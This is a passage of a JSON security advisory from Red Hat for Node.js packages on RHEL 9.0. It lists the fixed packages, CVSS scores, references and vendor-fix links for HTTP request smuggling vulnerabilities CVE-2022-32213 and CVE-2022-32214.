"AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: DNS rebinding in --inspect via invalid IP addresses" }, { "acknowledgments": [ { "names": [ "Zeyu Zhang" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2022-32213", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2022-07-08T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2105430" } ], "notes": [ { "category": "description", "text": "A vulnerability was found in NodeJS due to improper validation of HTTP requests. The llhttp parser in the http module does not correctly parse and validate Transfer-Encoding headers. This issue can lead to HTTP Request Smuggling (HRS), causing web cache poisoning, and conducting XSS attacks.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-32213" }, { "category": "external", "summary": "RHBZ#2105430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-32213", "url": "https://www.cve.org/CVERecord?id=CVE-2022-32213" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-32213", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32213" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/" } ], "release_date": "2022-07-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding" }, { "acknowledgments": [ { "names": [ "Zeyu Zhang" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2022-32214", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2022-07-08T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2105428" } ], "notes": [ { "category": "description", "text": "A vulnerability was found in NodeJS due to the llhttp parser in the http module not strictly using the CRLF sequence to delimit HTTP requests. This issue can lead to HTTP Request Smuggling (HRS). This flaw allows an attacker to send a specially crafted HTTP request to the server and smuggle arbitrary HTTP headers, causing web cache poisoning, and conducting XSS attacks.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling due to improper delimiting of header fields", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-32214" }, { "category": "external", "summary": "RHBZ#2105428", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105428" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-32214", "url": "https://www.cve.org/CVERecord?id=CVE-2022-32214" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-32214", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32214" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/" } ], "release_date": "2022-07-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: HTTP request smuggling due to improper delimiting of header fields" }, { "acknowledgments": [ { "names": [ "Zeyu Zhang" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2022-32215", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2022-07-08T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ 